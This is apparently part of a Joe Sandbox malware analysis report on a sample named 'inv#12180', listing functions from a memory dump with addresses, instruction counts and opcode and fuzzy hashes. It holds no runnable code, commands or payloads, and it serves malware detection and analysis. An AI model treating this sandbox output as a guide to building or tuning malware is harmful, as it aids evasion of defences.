                                                Function 01464690 Relevance: .1, Instructions: 57COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0ed85ca52511b7ef35c72c1ef1f454045296d8818f09071fa766598dd0e3db35
                                                • Instruction ID: 2ad95eed38b39e5b8751f0d80656b0516c254963fbff6358d74392a76f0a447e
                                                • Opcode Fuzzy Hash: 0ed85ca52511b7ef35c72c1ef1f454045296d8818f09071fa766598dd0e3db35
                                                • Instruction Fuzzy Hash: 4411E076200641AFDF21CF99C880B577BACEB95B6AF08411BF9048B760C338E840CF61
                                                Function 01496620 Relevance: .1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 39259af6ebe53da820296987c0a5b0001edf02f01e12b815ca9c4085f83c7bc4
                                                • Instruction ID: 83f00d89a9e51aed701ef30753d4c0e52c095d05554f5ad0f0ba561b18fe4347
                                                • Opcode Fuzzy Hash: 39259af6ebe53da820296987c0a5b0001edf02f01e12b815ca9c4085f83c7bc4
                                                • Instruction Fuzzy Hash: A1118272A00715ABDB21DF6AC980B5EFFB8FF94750F52045ADA05AB320D730AD018B90
                                                Function 0148EA2E Relevance: .1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dc2497d439290f106205f8c59f04af57e5cfb45493ac5ff6b16d9837507ec8a5
                                                • Instruction ID: dd9f2b3f203f01c73bf18561a4fddf969fe6ac2f43dd32591d830a4f3cd0561f
                                                • Opcode Fuzzy Hash: dc2497d439290f106205f8c59f04af57e5cfb45493ac5ff6b16d9837507ec8a5
                                                • Instruction Fuzzy Hash: B301D2715102059FC325EB19D414F2ABBF9FB91718F25816FE1049B270E770EC46DB90
                                                Function 0148E53E Relevance: .1, Instructions: 55COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                • Instruction ID: f723b973a9be5da7bdb51a4e200774448ddd445828c01930f42c5ed026e4d67c
                                                • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                • Instruction Fuzzy Hash: AD11E5752016C29BEB23AB6CC954BAA7B95EB01B44F1900ABDE4197772F33CC847D261
                                                Function 014EE75D Relevance: .1, Instructions: 54COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                • Instruction ID: c425d892e8401449def7d6444e14cd54014cbdad2e53862e0d233111c9db69fe
                                                • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                • Instruction Fuzzy Hash: 85012232240105AFE7219F5ACC08F5B7AE9EF55752F09846BEA04AB270E771DD40C790
                                                Function 0145A250 Relevance: .1, Instructions: 52COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                • Instruction ID: c08a5e338554998b078c6ff8ca11736cb7dd685766a86dea2c9697851aeb9ae6
                                                • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                • Instruction Fuzzy Hash: B1012631404722AFCB718F19E841A337BA8EF557A07108A2EFC958B3A2C331D401CB60
                                                Function 014DE1D0 Relevance: .1, Instructions: 51COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 05a52ed291e5a4668e97e4a30d8242547e2dca5cbdf8e6e8d46505917d4e319b
                                                • Instruction ID: 8940e23061a3b5fb1dda96847c5563646f6c419685795e1f8fc7f83b9c6b1046
                                                • Opcode Fuzzy Hash: 05a52ed291e5a4668e97e4a30d8242547e2dca5cbdf8e6e8d46505917d4e319b
                                                • Instruction Fuzzy Hash: 2C11A136241241EFDB15EF1ACDA0F567BB8FF64B44F1000AAE9059F661C235ED01CA90
                                                Function 01466259 Relevance: .1, Instructions: 51COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 428bff690a0527d6fadc0f6ca3fd99ad43e84d901def88485c314abf4065f990
                                                • Instruction ID: 254e4735d30e2544458b8faf6c8ee06a271979c41c5bcd4f49b700b84486686e
                                                • Opcode Fuzzy Hash: 428bff690a0527d6fadc0f6ca3fd99ad43e84d901def88485c314abf4065f990
                                                • Instruction Fuzzy Hash: CB119E70541218ABDB25AF25CC41FE9B278AB24710F9141DAA314A61F0D6709E81DF85
                                                Function 014E6050 Relevance: .0, Instructions: 50COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1debc8343f622c82b8b7749b58ca8fc0b4c13550de0f1013754267c021e95a14
                                                • Instruction ID: 17c19346508428f0c97025dd47fb0b99ca7c77484001192df686a6d3c993d359
                                                • Opcode Fuzzy Hash: 1debc8343f622c82b8b7749b58ca8fc0b4c13550de0f1013754267c021e95a14
                                                • Instruction Fuzzy Hash: 41112D73900119ABCB11DB95CC84DDFBBBCEF58254F054166E906E7211EA34EA15CBE0
                                                Function 0146208A Relevance: .0, Instructions: 50COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                • Instruction ID: 44b40156d417dfbacdf3b7a980be05de48ca72317df1a5e0f61738d1c7b7a49d
                                                • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                • Instruction Fuzzy Hash: BC01F572600101ABEF119E5DD880E93776ABFD4704F1544ABEE058F366DAB1C881C3A1
                                                Function 014F6500 Relevance: .0, Instructions: 50COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4952c57564912bb5268c5947f294fbc32cedfbbd47cb9f72658ddf927187c625
                                                • Instruction ID: 01f4042577de109676b90dd61fc0600ec28022d87dcd1820f7cc367dccbb50d9
                                                • Opcode Fuzzy Hash: 4952c57564912bb5268c5947f294fbc32cedfbbd47cb9f72658ddf927187c625
                                                • Instruction Fuzzy Hash: 861104326001469FC301CF28E810BA2BBB9FB5A314F09815EE948DF325D732EC85CBA0
                                                Function 014EC810 Relevance: .0, Instructions: 50COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bb5809204c73f2891c30c4f4779fda91b8af1c54146a5a107bf84ea7a71d52d4
                                                • Instruction ID: c82162e3f9153ac7841d2024655230815b2e763013e52d078926529855eea3e4
                                                • Opcode Fuzzy Hash: bb5809204c73f2891c30c4f4779fda91b8af1c54146a5a107bf84ea7a71d52d4
                                                • Instruction Fuzzy Hash: 64111CB1A002099BCB00DF9AD585A9EB7F4FF58350F15406AA905E7351D674EA018BA4
                                                Function 0150EA60 Relevance: .0, Instructions: 50COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fa14a9e3b6440ed580091a68daea902f55eb2c5a17d1c3d0284d3f1fb6743e01
                                                • Instruction ID: 320976de10c05e26be5a86dfab85e89e4a06bf7689daa21dd6ae6b07fd460ea8
                                                • Opcode Fuzzy Hash: fa14a9e3b6440ed580091a68daea902f55eb2c5a17d1c3d0284d3f1fb6743e01
                                                • Instruction Fuzzy Hash: 1F01F1315402119FC733AA6A8409D6ABBAAFF65690B244C2FE5151F6A0CBB09C81CB91
                                                Function 0145C020 Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                • Instruction ID: 24eef12c813f0ae61019534eff674bc38e9067393b8c734a918b5227e89eb093
                                                • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                • Instruction Fuzzy Hash: 840128325007059FEF22DAAAC880EA777EDFFD6614F04485FE9468B660DA70E402CB60
                                                Function 014A20F0 Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 333487291392bd86cd494a66683dadaf16a59cc5434154f0ac3030e3bdc75890
                                                • Instruction ID: d8ec08e63057da458ed8b16f5e59bde8bd2e6ba21d85ee1493e376266e7e02de
                                                • Opcode Fuzzy Hash: 333487291392bd86cd494a66683dadaf16a59cc5434154f0ac3030e3bdc75890
                                                • Instruction Fuzzy Hash: B511A975A0020DABCF01EFA4C850EAE7BB5EB64340F01405AE9119B2A0DB30AE02DB90
                                                Function 0149E5CF Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3ad51432ec9eb4808ba2aa5eae08770654890ef194ce0457518e4cdd1eb0f22d
                                                • Instruction ID: 999687d7b3a35d4cfe8b8e388d58abe54e574452bf3eed54434d5c586d66fd15
                                                • Opcode Fuzzy Hash: 3ad51432ec9eb4808ba2aa5eae08770654890ef194ce0457518e4cdd1eb0f22d
                                                • Instruction Fuzzy Hash: 29018472201951BFD711AB7ACD44E97BBACFBA4664700062FB50597671DB74EC01C6A0
                                                Function 014F69C0 Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ab1564534364662a8a5a0757d11ac094299b88960093aefde0977270102e9636
                                                • Instruction ID: 30487541a9e44cdf33d1114669086a5f79f65ace81d7c8b1621a5cfa4f35bf28
                                                • Opcode Fuzzy Hash: ab1564534364662a8a5a0757d11ac094299b88960093aefde0977270102e9636
                                                • Instruction Fuzzy Hash: E201F0327143019BD320DF6AD4489A7FBA8FF55660F52411FF96987390E7309905CBD1
                                                Function 014EC460 Relevance: .0, Instructions: 48COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5a73527eef3ff5fc43110ee165016cd5a3b5cb78e5142f1a906808c0bdb524b5
                                                • Instruction ID: e4395050c7c081ad36b85cf22f98650b168a1212877179256b57dbbeb5c1e10d
                                                • Opcode Fuzzy Hash: 5a73527eef3ff5fc43110ee165016cd5a3b5cb78e5142f1a906808c0bdb524b5
                                                • Instruction Fuzzy Hash: 0D115B75A00209ABDB15EF69C884EAE7BB6EB58340F01406AF90197360DB34EA11DB90
                                                Function 014EC97C Relevance: .0, Instructions: 48COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0b76ae5f65e91f0c0d33b4edd7db763d3b5571e101db8c6ddbd288d10ac43ca6
                                                • Instruction ID: 23cbe67a0e09529d7b93171cc435ac8d0032d48dbc0d841ef42b1ffe74910d6c
                                                • Opcode Fuzzy Hash: 0b76ae5f65e91f0c0d33b4edd7db763d3b5571e101db8c6ddbd288d10ac43ca6
                                                • Instruction Fuzzy Hash: C11179B16083089FC700DF6AC44599BBBE4EFA8310F00451FB998D73A1E630E901CB92
                                                Function 014ECA11 Relevance: .0, Instructions: 48COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c28f12b4832ef717f3693ce096f50303c1414ec1ba9ebb11e673e4b159e1f5cd
                                                • Instruction ID: fbdfd9ff26ec9fe4298e36b816ce4190d1ca6e16ce7a8c842c2c3a62f779756a
                                                • Opcode Fuzzy Hash: c28f12b4832ef717f3693ce096f50303c1414ec1ba9ebb11e673e4b159e1f5cd
                                                • Instruction Fuzzy Hash: CB1179B16083089FC310DF6AC445A8BBBE4FFA9350F00851FB958D73A0E630E901CB92
                                                Function 01534A80 Relevance: .0, Instructions: 48COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                • Instruction ID: c4ce7e5c054d80babd6eef178f183ef9af71f93c8e654857592dc52b7190baeb
                                                • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                • Instruction Fuzzy Hash: D201D8322046059FD721DA59D844F9AB7E7FBC6210F044819E6428F650DAB0F842C754
                                                Function 0147E016 Relevance: .0, Instructions: 46COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                • Instruction ID: 035896ec9acf2215002a08371fc40b3142c782909bfb46db75b6f5222aa83023
                                                • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                • Instruction Fuzzy Hash: C4017CB22015C09FE323861DC948FA77BE8EB5A758F0904A7FA05DB7B2D678DC41C661
                                                Function 0145826B Relevance: .0, Instructions: 46COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bb6ae5878197588053d523413cead19a3d7250aba1509dd8051cc666dbc90ae0
                                                • Instruction ID: e219182c4403d197c5fc4f6d3af9b85a1dce05c23187db130cf59a4497d72729
                                                • Opcode Fuzzy Hash: bb6ae5878197588053d523413cead19a3d7250aba1509dd8051cc666dbc90ae0
                                                • Instruction Fuzzy Hash: CD01D4317006069BE754DB6BD8149AF7BE9FF90690B06402BAD01EB765DE70D901C691
                                                Function 0150EB50 Relevance: .0, Instructions: 46COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 72bf5ec9a58f228e3073d4e1a9003308d333318f7e58ecdda86164d61117b5ca
                                                • Instruction ID: 46fd68ffa5cc5e5d564d787e54f578f2ee23d0243fda81f4af398e062c836f4f
                                                • Opcode Fuzzy Hash: 72bf5ec9a58f228e3073d4e1a9003308d333318f7e58ecdda86164d61117b5ca
                                                • Instruction Fuzzy Hash: CC01A771640701AFD3325B56D851F46BBA8FF65B90F114C2FB6099F7E0D6B0D8418B94
                                                Function 01462582 Relevance: .0, Instructions: 45COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2522908d7f7598ea0067c0348ef797dddb9d82bde12456c55aed290b20dc83aa
                                                • Instruction ID: 738031537ebc128df56e8c4daae3ecae2b2a046618b95ac3f4c2157357d92d94
                                                • Opcode Fuzzy Hash: 2522908d7f7598ea0067c0348ef797dddb9d82bde12456c55aed290b20dc83aa
                                                • Instruction Fuzzy Hash: 67F0F932741610BBC7319F578C40F877EADEB94B94F00442EA60A97620C670ED01C7A1
                                                Function 0148C073 Relevance: .0, Instructions: 43COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                • Instruction ID: 971d9414b3c544a41643cfe3d0068577a7c5bec5c3def23b10cade401cb6756d
                                                • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                • Instruction Fuzzy Hash: 0CF0C2F2600611ABD324DF8EDC40E97FBEEDBE1A90F058529A645CB320EA31DD05CB90
                                                Function 0145C310 Relevance: .0, Instructions: 43COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                • Instruction ID: 085338c9421c196586a55926c4b5d56cba5c2079f572ad31fb2e9d693bddbee6
                                                • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                • Instruction Fuzzy Hash: AAF0F2731047239BD7721B9A44C0B6B669D8FE1A64F150037EA0557263C9718D0296D1
                                                Function 0149CA6F Relevance: .0, Instructions: 42COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                • Instruction ID: b0af05ebdbc0c6e6c4942c97dcfe157b0f5e19645e708406c49550c547172f84
                                                • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                • Instruction Fuzzy Hash: C901F4322006869BEB22D75DC849FAABFD8EF51750F0840BBFA048B7B1E778C801C211
                                                Function 015361E5 Relevance: .0, Instructions: 41COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2db87d6ad216006333973a270585705c825e145be2eb9a900fb18dc540f23ae9
                                                • Instruction ID: a02e03aaeb92adfa45524e6b8378dd5f032fccfca162e045aafe7a8eca7d93a4
                                                • Opcode Fuzzy Hash: 2db87d6ad216006333973a270585705c825e145be2eb9a900fb18dc540f23ae9
                                                • Instruction Fuzzy Hash: 2D018F71A00249ABDB00DFAAD445AEEBBF8BF68310F15005EF500AB290D774EA01CBA4
                                                Function 014E63C0 Relevance: .0, Instructions: 41COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                • Instruction ID: 6f7563053f637dbc32a2bc1dedd7845765cfb8403be11beff051d643f6c41e8e
                                                • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                • Instruction Fuzzy Hash: 0CF01D7220001DBFEF019F95DD80DEF7BBEEB69298F114129FA1192170D631DE21ABA0
                                                Function 014EA4B0 Relevance: .0, Instructions: 40COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b29de61896fe53e9c52cff301623c9d2c620a11fa110f6910f53b9871f42b4fa
                                                • Instruction ID: 781a7ddc2d9365dac0422348469e9986e07685118027d7c10357947764834955
                                                • Opcode Fuzzy Hash: b29de61896fe53e9c52cff301623c9d2c620a11fa110f6910f53b9871f42b4fa
                                                • Instruction Fuzzy Hash: F7018936110219ABCF129E94D844EDA3FA6FB4C655F068116FE186A220C336D971EB91
                                                Function 0145C0F0 Relevance: .0, Instructions: 39COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 34ff34f9b49ad93d69593ca248e7a4f748417700a94f79feda43bde591ce5105
                                                • Instruction ID: 941bf7645ea1e95ded927858fa783df7050db007f5a28dace6a1a7fbc8aca86d
                                                • Opcode Fuzzy Hash: 34ff34f9b49ad93d69593ca248e7a4f748417700a94f79feda43bde591ce5105
                                                • Instruction Fuzzy Hash: 46F02BB23043415BF39495198C81F23369DE7D4651F25802BEF058B7F3EA70DC018B94
                                                Function 0149656A Relevance: .0, Instructions: 39COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c64a10f87da4a9eca54dd0269a3a0ca069e1ed0a573a360a6256cc665a07323a
                                                • Instruction ID: a2adde1cc93455cce2fce348d1bf08689eef4d62fa02785aff84b360b0bbcd30
                                                • Opcode Fuzzy Hash: c64a10f87da4a9eca54dd0269a3a0ca069e1ed0a573a360a6256cc665a07323a
                                                • Instruction Fuzzy Hash: 4E01A4703007819BFB229B2DDD58F263BA4BB50B50F4A0596BA118BBF6EB78D4028610
                                                Function 0150437C Relevance: .0, Instructions: 37COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
